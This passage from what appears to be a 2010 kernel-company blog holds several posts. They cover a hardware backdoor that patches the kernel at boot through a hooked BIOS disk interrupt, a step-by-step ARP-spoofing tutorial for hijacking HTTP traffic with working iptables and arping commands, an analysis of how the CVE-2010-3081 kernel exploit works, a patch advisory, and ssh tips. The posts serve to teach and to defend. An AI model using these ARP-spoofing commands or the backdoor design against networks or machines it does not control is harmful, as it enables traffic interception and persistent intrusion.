Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch, and if it does, modify that data in memory. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.
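The real handler is real-mode assembly living on the expansion ROM, but its logic can be modelled in a few lines. In this sketch, original_read stands in for the BIOS's int 0x13 routine, and patches maps the first bytes of a sector we care about to an (offset, replacement) pair; both of those names, and the function itself, are hypothetical.

```python
SECTOR_SIZE = 512


def make_hooked_reader(original_read, patches):
    """Wrap a sector-read function so matching sectors are patched on the way out.

    patches maps a sector's leading bytes to (offset_in_sector, replacement_bytes).
    """
    def hooked_read(lba, count):
        # First let the original handler do the actual disk read.
        data = bytearray(original_read(lba, count))
        for index in range(count):
            start = index * SECTOR_SIZE
            for prefix, (offset, replacement) in patches.items():
                # Recognise a target sector by its first few bytes.
                if data.startswith(prefix, start):
                    begin = start + offset
                    data[begin:begin + len(replacement)] = replacement
        return bytes(data)

    return hooked_read
```

The caller, GRUB in our case, never sees the unmodified bytes, while the data on the disk itself is left untouched.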

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.


Wednesday Sep 29, 2010

Hijacking HTTP traffic on your home subnet using ARP and iptables

Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state.

The setup

Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage:

will you marry me, with unicorns

How do we accomplish this?

The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address.

ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway.

Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address", and the gateway broadcasts an ARP response saying "I have, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet.

But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients.
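To make the "it just asserted who it was" point concrete, here is a toy model of an ARP cache in Python. It is a sketch under simplifying assumptions: real network stacks differ in how readily they accept unsolicited replies, the `ArpCache` class is made up for illustration, and the gateway IP is a placeholder from the documentation range. The MAC addresses are the ones listed in Step 1.

```python
class ArpCache:
    """Toy model of a host's ARP cache: IP address -> MAC address."""

    def __init__(self):
        self.entries = {}

    def on_arp_reply(self, sender_ip, sender_mac):
        # Nothing is authenticated: whoever spoke last wins.
        self.entries[sender_ip] = sender_mac

    def lookup(self, ip):
        return self.entries.get(ip)

GATEWAY_IP = "192.0.2.1"   # hypothetical placeholder address

cache = ArpCache()
cache.on_arp_reply(GATEWAY_IP, "68:7f:74:9a:f4:ca")   # the real router answers
before = cache.lookup(GATEWAY_IP)
cache.on_arp_reply(GATEWAY_IP, "00:30:1b:47:f2:74")   # another host makes the same claim
after = cache.lookup(GATEWAY_IP)
```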

Step 1: The layout

I did this at home. The three machines involved were:

  • real gateway router: IP address, MAC address 68:7f:74:9a:f4:ca
  • fake gateway: a desktop called kid-charlemagne, IP address, MAC address 00:30:1b:47:f2:74
  • test machine getting duped: a laptop on wireless called pixeleen, IP address, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 2: Enable IPv4 forwarding

kid-charlemagne wants to receive packets that aren't destined for it (e.g. the web traffic). Unless IP forwarding is enabled, the networking subsystem will ignore packets that aren't addressed to us. So the first thing to do is enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward:

root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3: Set routing rules so packets going through the gateway get routed to you

kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes the final destination for the web traffic:

PREROUTING rule to rewrite the source IP address

For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet.

We can set up this routing rule with the following iptables command:

jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp --dport 80 -j NETMAP --to

The iptables command has 3 components:

  • When to apply a rule (-A PREROUTING)
  • What packets get that rule (-p tcp --dport 80)
  • The actual rule (-t nat ... -j NETMAP --to

-t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied.

What packets

That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action:

The rule

If we receive a packet heading for some destination, rewrite the destination in the IP header to be (NETMAP --to Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination.

In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address,, the destination, NATting both ways so this is transparent to the source."
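The two-way rewrite can be modelled in a few lines of Python. This is a sketch of the bookkeeping only, not of how netfilter implements it; the `ToyNat` class, the dict-based packets, and every IP address below are hypothetical placeholders.

```python
class ToyNat:
    """Toy model of the PREROUTING rewrite plus the reverse mapping."""

    def __init__(self, my_ip):
        self.my_ip = my_ip
        self.original_dst = {}   # (client_ip, client_port) -> original destination IP

    def inbound(self, pkt):
        """Packet from a client heading out: redirect port-80 TCP to ourselves."""
        if pkt["proto"] == "tcp" and pkt["dport"] == 80:
            self.original_dst[(pkt["src"], pkt["sport"])] = pkt["dst"]
            return dict(pkt, dst=self.my_ip)
        return pkt               # everything else passes through untouched

    def outbound(self, pkt):
        """Reply from our web server: put the original destination back as the source."""
        key = (pkt["dst"], pkt["dport"])
        if key in self.original_dst:
            return dict(pkt, src=self.original_dst[key])
        return pkt

nat = ToyNat(my_ip="192.0.2.10")
request = {"proto": "tcp", "src": "192.0.2.50", "sport": 51000,
           "dst": "198.51.100.7", "dport": 80}
rewritten = nat.inbound(request)

reply = {"proto": "tcp", "src": "192.0.2.10", "sport": 80,
         "dst": "192.0.2.50", "dport": 51000}
returned = nat.outbound(reply)

dns = {"proto": "udp", "src": "192.0.2.50", "sport": 40000,
       "dst": "198.51.100.53", "dport": 53}
forwarded = nat.inbound(dns)
```

From the client's point of view, the reply in `returned` appears to come from the site it asked for, which is why the redirection is invisible at the IP layer.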

One last thing:

The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0.

jesstess@kid-charlemagne:~$ sudo ip addr add dev eth0

We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address, and the gateway address

jesstess@kid-charlemagne:~$ ip addr
3: eth0:  mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
    inet scope global secondary eth0
    inet6 fe80::230:1bff:fe47:f274/64 scope link
       valid_lft forever preferred_lft forever

Step 4: Set yourself up to respond to HTTP requests

kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting.

Step 5: Test pretending to be the gateway

At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for”. Machines that hear that Gratuitous ARP will replace an existing mapping from to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.
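For the curious, here is roughly what such a packet looks like on the wire. This Python sketch only builds the bytes of an Ethernet frame carrying an ARP reply in which the sender and target IP are the same; it does not send anything. The IP address is a placeholder, and filling the target hardware address with the broadcast address is an assumption, since implementations vary on that field.

```python
import socket
import struct

def mac_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' into 6 raw bytes."""
    return bytes(int(part, 16) for part in mac.split(":"))

def gratuitous_arp_frame(sender_mac, claimed_ip):
    """Build an Ethernet frame carrying a gratuitous ARP reply."""
    broadcast = b"\xff" * 6
    sha = mac_bytes(sender_mac)            # sender hardware address
    spa = socket.inet_aton(claimed_ip)     # sender protocol address (the IP we claim)
    # Ethernet header: destination, source, EtherType 0x0806 (ARP)
    ethernet = broadcast + sha + struct.pack("!H", 0x0806)
    # ARP header: Ethernet (1), IPv4 (0x0800), address lengths 6 and 4, opcode 2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    # Gratuitous: sender IP and target IP are identical
    arp += sha + spa + broadcast + spa
    return ethernet + arp

# MAC of kid-charlemagne from the layout above; the IP is a hypothetical placeholder.
frame = gratuitous_arp_frame("00:30:1b:47:f2:74", "192.0.2.1")
```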

We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitous ARP is working.

pixeleen’s ARP cache before the Gratuitous ARP:

jesstess@pixeleen$ arp -a
? ( at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet]
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

68:7f:74:9a:f4:ca is the MAC address of the real gateway router.

There are lots of command line utilities and bindings in various programming languages that make it easy to issue ARP packets. I used the arping tool:

jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0

We'll send a Gratuitous ARP reply (-A), three times (-c 3), on the eth0 interface (-I eth0) for IP address

As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache:

jesstess@pixeleen$ arp -a
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]
? ( at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

Bam. pixeleen now thinks the MAC address for IP address is 0:30:1b:47:f2:74, which is kid-charlemagne’s address.

If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server.

We can watch this whole exchange in Wireshark:

First, the Gratuitous ARPs generated by kid-charlemagne:

Gratuitous ARPs generated by kid-c

The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

DNS response to pixeleen for

The HTTP traffic gets served by kid-charlemagne:

HTTP traffic viewed in Wireshark

Note that the HTTP request has a source IP of, pixeleen, and a destination IP of, which dig -x +short tells us is The HTTP response has a source IP of and a destination IP of The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer.

Step 6: Deploy against friends and family

I trust you to get creative with this.

Step 7: Reset everything to the normal state

To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule:

jesstess@kid-charlemagne:~$ sudo ip addr delete dev eth0
jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to

To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices.

In summary

That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to:

  1. enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  2. set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to
  3. add the gateway IP address to the appropriate interface: ip addr add dev eth0
  4. ARP for the gateway MAC address: arping -c 3 -A -I eth0

substituting the appropriate IP address and interface information and tearing down when you're done.

And that's all there is to it!

This has been tested as working in a few environments, but it might not work in yours. I'd love to hear in the comments whether this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise).

--> Huge thank-you to fellow experimenter adamf. <---


Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't already copy them from an earlier exploit, his or her own or someone else's, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:
  static inline void __user *compat_alloc_user_space(long len)
  {
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
  }
The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.
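The wraparound is just 64-bit pointer arithmetic, which we can model in Python. This is a sketch, not kernel code: the stack pointer, the length, and `USER_LIMIT` are hypothetical values chosen for illustration, and `access_ok` here is a simplified range check rather than the kernel's implementation.

```python
MASK64 = (1 << 64) - 1
USER_LIMIT = 0x0000_7FFF_FFFF_F000   # hypothetical top of user space

def compat_alloc_user_space(sp, length):
    """Model of the unchecked routine: pointer arithmetic modulo 2**64."""
    return (sp - length) & MASK64

def access_ok(addr, length, limit=USER_LIMIT):
    """Simplified check that [addr, addr + length) lies below `limit`."""
    return length <= limit and addr <= limit - length

def compat_alloc_user_space_fixed(sp, length):
    """Model of the fix: refuse to hand out anything that fails the check."""
    addr = compat_alloc_user_space(sp, length)
    return addr if access_ok(addr, length) else None

sp = 0x1000             # hypothetical user stack pointer chosen by the attacker
length = 0x7FFF_0000    # hypothetical length just under 2GB

addr = compat_alloc_user_space(sp, length)            # wraps past zero
checked = compat_alloc_user_space_fixed(sp, length)   # rejected by the check
normal = compat_alloc_user_space_fixed(0xFFFF_D000, 0x100)
```

With these numbers `addr` comes out as 0xffffffff80011000, up in the top 2GB of the address space, while an ordinary request from a normal-looking stack pointer still succeeds.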

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.
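The idea shared by these targets, a table of function pointers that the kernel dispatches through, can be modelled in a few lines of Python. This is only an illustration of the dispatch mechanism: `FileOps`, `vfs_poll`, `generic_poll`, and `payload` are made-up names, and the "overwrite" is an ordinary attribute assignment rather than a stray kernel write.

```python
class FileOps:
    """Toy stand-in for an "ops struct": a table of method pointers."""

    def __init__(self, read, poll=None):
        self.read = read
        self.poll = poll          # None models "method not provided"

class File:
    def __init__(self, ops):
        self.ops = ops

def generic_poll(f):
    return "generic poll"

def vfs_poll(f):
    """Dispatch through the table, falling back to a generic behaviour."""
    handler = f.ops.poll or generic_poll
    return handler(f)

def payload(f):
    return "payload ran"

timer_list = File(FileOps(read=lambda f: "timer data"))
before = vfs_poll(timer_list)     # nobody provided poll, so the generic one runs
timer_list.ops.poll = payload     # models the write landing on the pointer
after = vfs_poll(timer_list)      # the same call now runs different code
```

Nothing about the caller changes between the two calls, which is what makes an unused slot in such a table an attractive target.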

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't conclude that you're not vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3:
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is an almost unlimited amount of work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.


Friday Sep 17, 2010


Hi. I'm the original developer of Ksplice and the CEO of the company. Today is one of those days that reminds me why I created Ksplice.

I'm writing this blog post to provide some information and assistance to anyone affected by the recent Linux kernel vulnerability CVE-2010-3081, which unfortunately is just about everyone running 64-bit Linux. To make matters worse, in the last day we've received many reports of people attacking production systems using an exploit for this vulnerability, so if you run Linux systems, we recommend that you strongly consider patching this vulnerability. (Linux vendors release important security updates every month, but this vulnerability is particularly high profile and people are using it aggressively to exploit systems).

This vulnerability was introduced into the Linux kernel in April 2008, and so essentially every distribution is affected, including RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, CloudLinux, and SuSE, among others. A few vendors have released kernels that fix the vulnerability if you reboot, but other vendors, including Red Hat, are still working on releasing an updated kernel.

The published workarounds that we've seen, including the workaround recommended by Red Hat, can themselves be worked around by an attacker to still exploit the system. For now, to be responsible and avoid helping attackers, we don't want to provide those technical details publicly; we've contacted Red Hat and other vendors with the details and we'll cover them in a future blog post, in a few weeks.

Although it might seem self-serving, I do know of one sure way to fix this vulnerability right away on running production systems, and it doesn't even require you to reboot: you can (for free) download Ksplice Uptrack and fully update any of the distributions that we support (We support RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, and CloudLinux. For high profile updates like this one, Ksplice optionally makes available an update for your distribution before your distribution officially releases a new kernel). We provide a free 30-day trial of Ksplice Uptrack on our website, and you can use this free trial to protect your systems, even if you cannot arrange to reboot anytime soon. It's the best that we can do to help in this situation, and I hope that it's useful to you.

Note: If an attacker has already compromised one of your machines using an exploit for CVE-2010-3081, simply updating the system will not eliminate the presence of an attacker. Similarly, if a machine has already been exploited, then the exploit may continue working on that system even after it has been updated, because of a backdoor that the exploit installs. We've published a test tool to check whether your system has already been compromised by the public CVE-2010-3081 exploit code that we've seen. If one or more of your machines has already been compromised by an attacker, we recommend that you use your normal procedure for dealing with that situation.


Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run commands on their own? Well, you can--just stick the command name after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr
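
If your scripting happens in Python rather than the shell, the same idea looks roughly like this. It is a minimal sketch that assumes passwordless logins are already set up; `ssh_argv` and `run_on_hosts` are hypothetical helper names, not part of any library.

```python
import subprocess

def ssh_argv(host, remote_command, tty=False):
    """Build the argument list for running one command on one host."""
    argv = ["ssh"]
    if tty:
        argv.append("-t")         # force pseudo-tty allocation
    argv.append(host)
    argv.append(remote_command)   # ssh hands this string to the remote shell
    return argv

def run_on_hosts(hosts, remote_command):
    """Run the same command on every host and collect whatever it prints."""
    results = {}
    for host in hosts:
        proc = subprocess.run(ssh_argv(host, remote_command),
                              capture_output=True, text=True)
        # Some programs print version information on stderr, so keep both streams.
        results[host] = (proc.stdout + proc.stderr).strip()
    return results
```

Calling `run_on_hosts(["bebop", "rocksteady"], "python -V")` would then return a dictionary mapping each hostname to its Python version string.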

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs at analytics on port 80 and is only accessible from inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: this connection is being set up on the remote system (desktop), which is the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

